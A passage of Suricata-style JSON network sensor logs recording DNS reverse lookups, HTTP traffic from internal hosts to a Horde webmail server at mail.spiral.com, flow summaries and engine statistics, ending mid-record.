{"timestamp":"2020-02-29T00:20:31.841937+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49402,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26439,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:31.872860+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:20:31.892012+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5411}} {"timestamp":"2020-02-29T00:20:31.950688+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49402,"proto":"UDP","dns":{"type":"answer","id":26439,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:31.950688+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49402,"proto":"UDP","dns":{"type":"answer","id":26439,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:34.000209+0000","event_type":"stats","stats":{"uptime":14886,"capture":{"kernel_packets":137355,"kernel_drops":0},"decoder":{"pkts":137371,"bytes":94199869,"invalid":193,"ipv4":135824,"ipv6":10,"ethernet":137371,"raw":0,"null":0,"sll":0,"tcp":130328,"udp":5288,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2837,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2853,"synack":2844,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1872,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2421,"failed_udp":112},"tx":{"http":4800,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2503}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2475,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20171,"memcap_state":0,"memcap_global":0},"http":{"memuse":75698,"memcap":0}}} {"timestamp":"2020-02-29T00:20:36.893668+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52934,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5411},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:20:39.164889+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54649,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51815,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:39.276286+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54649,"proto":"UDP","dns":{"type":"answer","id":51815,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:39.276286+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54649,"proto":"UDP","dns":{"type":"answer","id":51815,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:39.420033+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:20:39.441359+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5416}} {"timestamp":"2020-02-29T00:20:41.000209+0000","event_type":"stats","stats":{"uptime":14893,"capture":{"kernel_packets":137381,"kernel_drops":0},"decoder":{"pkts":137395,"bytes":94208142,"invalid":193,"ipv4":135848,"ipv6":10,"ethernet":137395,"raw":0,"null":0,"sll":0,"tcp":130350,"udp":5290,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2838,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2854,"synack":2845,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1873,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2422,"failed_udp":112},"tx":{"http":4801,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2504}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2475,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":75756,"memcap":0}}} {"timestamp":"2020-02-29T00:20:41.470817+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37012,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63665,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:41.579975+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37012,"proto":"UDP","dns":{"type":"answer","id":63665,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:41.579975+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37012,"proto":"UDP","dns":{"type":"answer","id":63665,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:41.735561+0000","flow_id":1207103483610682,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34896,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7417}} {"timestamp":"2020-02-29T00:20:43.000190+0000","flow_id":708895863071501,"event_type":"flow","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1838,"bytes_toclient":6314,"start":"2020-02-29T00:19:37.451341+0000","end":"2020-02-29T00:19:42.475356+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000412+0000","flow_id":1590540979789703,"event_type":"flow","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":1283,"bytes_toclient":2382,"start":"2020-02-29T00:19:37.450439+0000","end":"2020-02-29T00:19:42.475231+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000708+0000","flow_id":1179362285679512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":14,"bytes_toserver":1678,"bytes_toclient":13124,"start":"2020-02-29T00:19:37.291736+0000","end":"2020-02-29T00:19:42.475450+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000952+0000","flow_id":1498976572011859,"event_type":"flow","src_ip":"192.168.10.81","src_port":52908,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":752,"bytes_toclient":1678,"start":"2020-02-29T00:19:37.456019+0000","end":"2020-02-29T00:19:42.466796+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.001168+0000","flow_id":2243994484072541,"event_type":"flow","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":35,"pkts_toclient":40,"bytes_toserver":3529,"bytes_toclient":50594,"start":"2020-02-29T00:19:37.450653+0000","end":"2020-02-29T00:19:42.622817+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:44.442565+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52936,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5416},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:20:45.000733+0000","flow_id":1508751902266416,"event_type":"flow","src_ip":"192.168.10.122","src_port":59127,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:44.873520+0000","end":"2020-02-29T00:15:44.982402+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:46.736224+0000","flow_id":1207103483610682,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34896,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7417},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36246,"tx_id":0}} {"timestamp":"2020-02-29T00:20:47.794898+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49707,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:47.903724+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49212,"proto":"UDP","dns":{"type":"answer","id":49707,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:47.903724+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49212,"proto":"UDP","dns":{"type":"answer","id":49707,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:47.972110+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8380}} {"timestamp":"2020-02-29T00:20:48.000201+0000","event_type":"stats","stats":{"uptime":14900,"capture":{"kernel_packets":137420,"kernel_drops":0},"decoder":{"pkts":137421,"bytes":94218240,"invalid":193,"ipv4":135872,"ipv6":10,"ethernet":137421,"raw":0,"null":0,"sll":0,"tcp":130370,"udp":5294,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2839,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2855,"synack":2846,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1874,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2423,"failed_udp":113},"tx":{"http":4802,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2505}},"flow_mgr":{"closed_pruned":2811,"new_pruned":17,"est_pruned":2476,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":105095,"memcap":0}}} {"timestamp":"2020-02-29T00:20:48.252101+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34898,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8380},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35098,"tx_id":0}} {"timestamp":"2020-02-29T00:20:48.266257+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54605,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:48.377643+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58554,"proto":"UDP","dns":{"type":"answer","id":54605,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:48.377643+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58554,"proto":"UDP","dns":{"type":"answer","id":54605,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:48.443639+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":1}} {"timestamp":"2020-02-29T00:20:48.443663+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":968}} {"timestamp":"2020-02-29T00:20:51.001279+0000","flow_id":1337670470361580,"event_type":"flow","src_ip":"192.168.10.122","src_port":47730,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:50.221676+0000","end":"2020-02-29T00:15:50.330124+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:53.000335+0000","flow_id":737255532685455,"event_type":"flow","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":23,"bytes_toserver":4481,"bytes_toclient":19168,"start":"2020-02-29T00:19:46.616591+0000","end":"2020-02-29T00:19:52.947214+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.000827+0000","flow_id":1877711068348992,"event_type":"flow","src_ip":"192.168.10.122","src_port":35574,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:52.475712+0000","end":"2020-02-29T00:15:52.580812+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:53.000963+0000","flow_id":1479997112177472,"event_type":"flow","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1895,"bytes_toclient":4685,"start":"2020-02-29T00:19:47.906048+0000","end":"2020-02-29T00:19:52.945156+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.001091+0000","flow_id":217650389304327,"event_type":"flow","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":2315,"bytes_toclient":3905,"start":"2020-02-29T00:19:47.902151+0000","end":"2020-02-29T00:19:52.945077+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.002294+0000","flow_id":1813814855284147,"event_type":"flow","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":13,"bytes_toserver":3894,"bytes_toclient":7440,"start":"2020-02-29T00:19:47.865715+0000","end":"2020-02-29T00:19:52.945234+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.445189+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34898,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":968},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2505,"tx_id":1}} {"timestamp":"2020-02-29T00:20:54.000194+0000","flow_id":1702579497324555,"event_type":"flow","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":17,"bytes_toserver":3120,"bytes_toclient":17124,"start":"2020-02-29T00:19:47.905227+0000","end":"2020-02-29T00:19:53.135539+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:54.001106+0000","flow_id":1347789426886640,"event_type":"flow","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":2079,"bytes_toclient":5519,"start":"2020-02-29T00:19:17.296944+0000","end":"2020-02-29T00:19:53.109237+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:55.000254+0000","event_type":"stats","stats":{"uptime":14907,"capture":{"kernel_packets":137460,"kernel_drops":0},"decoder":{"pkts":137460,"bytes":94232530,"invalid":193,"ipv4":135909,"ipv6":10,"ethernet":137460,"raw":0,"null":0,"sll":0,"tcp":130403,"udp":5298,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2840,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2856,"synack":2847,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1875,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2425,"failed_udp":113},"tx":{"http":4804,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2507}},"flow_mgr":{"closed_pruned":2815,"new_pruned":17,"est_pruned":2478,"bypassed_pruned":0,"flows_checked":2,"flows_notim